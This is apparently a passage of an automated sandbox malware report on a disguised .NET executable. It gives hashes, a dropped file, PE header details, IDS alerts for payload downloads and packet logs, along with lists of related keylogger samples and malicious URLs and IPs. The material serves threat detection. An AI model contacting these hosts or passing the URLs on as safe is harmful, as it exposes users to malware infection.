                        QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                        • 67.212.175.162
                        450230549.exeGet hashmaliciousAgentTeslaBrowse
                        • 67.212.175.162
                        450230549.exeGet hashmaliciousUnknownBrowse
                        • 67.212.175.162
                        TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                        • 67.212.175.162
                        https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                        • 67.212.175.162
                        http://tiktok1688.cc/Get hashmaliciousUnknownBrowse
                        • 67.212.175.162
                        https://qwekorqw-eqo.top/Get hashmaliciousUnknownBrowse
                        • 67.212.175.162
                        https://qwoms-dei3.top/Get hashmaliciousUnknownBrowse
                        • 67.212.175.162
                        http://cmn.pkgu192.vip/Get hashmaliciousUnknownBrowse
                        • 67.212.175.162

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Roaming\Gydvapkca.exe

                        Download File
                        Process:C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):35328
                        Entropy (8bit):5.843001466418759
                        Encrypted:false
                        SSDEEP:768:hv2b4c1Jq7JN32aZzxya2sKE0HMN6G8jrWz0hsg4spg+:h0457JNHosn0GAvWz0uxB+
                        MD5:C3490999B5E36705B9B2ABB2A3ED08C1
                        SHA1:F6AF8F800B5E86D12EA5A1A5567DA493D0C816B3
                        SHA-256:8F2DD3233B7B97265BCDFC1053875652D9F9012D3716DE034F73B5CAADD78D7B
                        SHA-512:4E0FAC9AA28DBA4129E1C35CCB14A2CDE1562D62F3FD920F490CC28B1C875DF54911DC497C5748772DCF3F06A33F68CE9A87EBD1C7DF585C05A1C952635531A8
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 63%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................`.................................4...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........Z..@D......q...hT...............................................0..3........ .|*(`...(....... ..|*(`...(....(....}.....(....*...{....(....uJ...%-.&.+.(....u%...*.J.{.....s....(....*.&...s....*..:.(......}....*...{....*:.(......}....*.V..jo......{....o ...*..B ..|*(`...s!...z.....(....*.s.........*.~l...*..*...*....*...*...*...*...*...*...*...*...*...*...*...*...*...*...*.. ..|*(`...*.0...........s....}.....s"...}.....s#...}.....(......}......((.....}.......,...s$...

                        C:\Users\user\AppData\Roaming\Gydvapkca.exe:Zone.Identifier

                        Download File
                        Process:C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Reputation:high, very likely benign file
                        Preview:[ZoneTransfer]....ZoneId=0

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):5.843001466418759
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:RFQ____RM quotation_JPEG IMAGE.img.exe
                        File size:35'328 bytes
                        MD5:c3490999b5e36705b9b2abb2a3ed08c1
                        SHA1:f6af8f800b5e86d12ea5a1a5567da493d0c816b3
                        SHA256:8f2dd3233b7b97265bcdfc1053875652d9f9012d3716de034f73b5caadd78d7b
                        SHA512:4e0fac9aa28dba4129e1c35ccb14a2cde1562d62f3fd920f490cc28b1c875df54911dc497c5748772dcf3f06a33f68ce9a87ebd1c7df585c05a1c952635531a8
                        SSDEEP:768:hv2b4c1Jq7JN32aZzxya2sKE0HMN6G8jrWz0hsg4spg+:h0457JNHosn0GAvWz0uxB+
                        TLSH:BBF2EA2C1BD8CA63CA9F19B8A6B391011771D367F443F74B5BA0D2B1A6277CB0D21197
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................`................................

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x409f8e
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F498AD [Wed Sep 25 23:11:41 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, byte ptr [eax]
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        and byte ptr [eax], al
                        add byte ptr [eax+00000018h], al
                        cmp byte ptr [eax], al
                        add byte ptr [eax+00000000h], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax], eax
                        add dword ptr [eax], eax
                        add byte ptr [eax], al
                        push eax
                        add byte ptr [eax], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax], eax
                        add dword ptr [eax], eax
                        add byte ptr [eax], al
                        push 00800000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9f340x57.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x580.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x20000x7f940x800067bd0c036e53f52e4006ece0c4cc8226False0.510986328125data5.9512691827204325IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0xa0000x5800x600d0cbf1f3306eef609d1dee53fb0fea69False0.4173177083333333data4.419897595758129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0xc0000xc0x2000c4ea6f1598c429832f3e46ceede309cFalse0.044921875data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0xa0a00x32cdata0.4211822660098522
                        RT_MANIFEST0xa3cc0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-09-26T09:57:59.328439+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.549704TCP
                        2024-09-26T09:57:59.328439+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.549704TCP
                        2024-09-26T09:58:02.914824+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705158.101.44.24280TCP
                        2024-09-26T09:58:03.945997+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705158.101.44.24280TCP
                        2024-09-26T09:58:04.501438+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549707188.114.96.3443TCP
                        2024-09-26T09:58:06.961661+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708158.101.44.24280TCP
                        2024-09-26T09:58:07.546643+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549709188.114.96.3443TCP
                        2024-09-26T09:58:12.351328+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.549712TCP
                        2024-09-26T09:58:12.351328+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.549712TCP
                        2024-09-26T09:58:17.258472+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549719158.101.44.24280TCP
                        2024-09-26T09:58:18.086608+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549719158.101.44.24280TCP
                        2024-09-26T09:58:18.647214+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549728188.114.96.3443TCP
                        2024-09-26T09:58:19.383486+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549729158.101.44.24280TCP
                        2024-09-26T09:58:19.659022+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549730188.114.96.3443TCP
                        2024-09-26T09:58:20.390717+02002017962ET MALWARE PE EXE or DLL Windows file download disguised as ASCII167.212.175.162443192.168.2.549732TCP
                        2024-09-26T09:58:20.390717+02002022640ET MALWARE PE EXE or DLL Windows file download Text M2167.212.175.162443192.168.2.549732TCP
                        2024-09-26T09:58:24.789748+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549738158.101.44.24280TCP
                        2024-09-26T09:58:25.696094+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549738158.101.44.24280TCP
                        2024-09-26T09:58:26.236139+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549744188.114.96.3443TCP
                        2024-09-26T09:58:27.196006+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549746158.101.44.24280TCP
                        2024-09-26T09:58:36.205264+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549755188.114.96.3443TCP
                        2024-09-26T09:58:38.967275+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549757188.114.96.3443TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 09:57:58.496215105 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:58.496267080 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:58.496354103 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:58.508337975 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:58.508378983 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.014486074 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.014648914 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.018589973 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.018601894 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.018939972 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.070945024 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.095242977 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.135407925 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.221115112 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.221158028 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.221167088 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.221204996 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.221224070 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.221240044 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.221255064 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.241580963 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.241662025 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.241683006 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.291687965 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.307063103 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.307079077 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.307126999 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.307192087 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.307240009 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.308583021 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.308593035 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.308654070 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.309509993 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.309518099 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.309587955 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.328493118 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.328505993 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.328731060 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.393691063 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.393723965 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.393984079 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.394258022 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.394279957 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.394350052 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.395109892 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.395123959 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.395247936 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.396529913 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.396702051 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.397454977 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.397536039 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.398353100 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.398444891 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.399290085 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.399394035 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.415438890 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.415589094 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.480567932 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.480673075 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.480746031 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.480746031 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.480783939 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.480834961 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.480921030 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.480992079 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.481314898 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.481443882 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.481506109 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.481581926 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.482006073 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.482074022 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.482193947 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.482264996 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.482750893 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.482799053 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.482829094 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.482845068 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.482872963 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.482898951 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.482933044 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.482994080 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.483803034 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.483875036 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.483887911 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.483952999 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.485759020 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.485838890 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.502450943 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.502509117 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.502526045 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.502549887 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.502587080 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.502608061 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.567560911 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.567616940 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.567651987 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.567673922 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.567697048 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.567727089 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.568466902 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568537951 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.568537951 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568556070 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568591118 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.568607092 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568634987 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.568640947 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568655968 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568676949 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.568695068 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.568698883 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568708897 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568727970 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.568732023 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.568774939 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.573508024 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.573611975 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.573734999 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.573792934 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.573996067 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.574045897 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.574210882 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.574270010 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.574399948 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.574449062 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.574572086 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.574642897 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.589276075 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.589349031 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.589400053 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.589463949 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.599570036 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.599667072 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.654705048 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.654850006 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.654889107 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.654956102 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655040979 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655112028 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655158997 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655230045 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655282974 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655347109 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655448914 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655514956 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655565023 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655630112 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655683994 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655750990 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655801058 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655868053 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.655915022 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.655978918 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.656028032 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.656092882 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.656142950 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.656213045 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.656254053 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.656315088 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.656344891 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.656433105 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.676167011 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.676229000 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.676333904 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.676412106 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.676450968 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.676472902 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.741185904 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.741262913 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.741298914 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.741323948 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.741380930 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.741394997 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.741494894 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.741547108 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.741888046 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.741955042 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.742105007 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.742166996 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.742351055 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.742413998 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.742635965 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.742698908 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.742862940 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.742929935 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.743139029 CEST4434970467.212.175.162192.168.2.5
                        Sep 26, 2024 09:57:59.743201017 CEST49704443192.168.2.567.212.175.162
                        Sep 26, 2024 09:57:59.743206978 CEST4434970467.212.175.162192.168.2.5
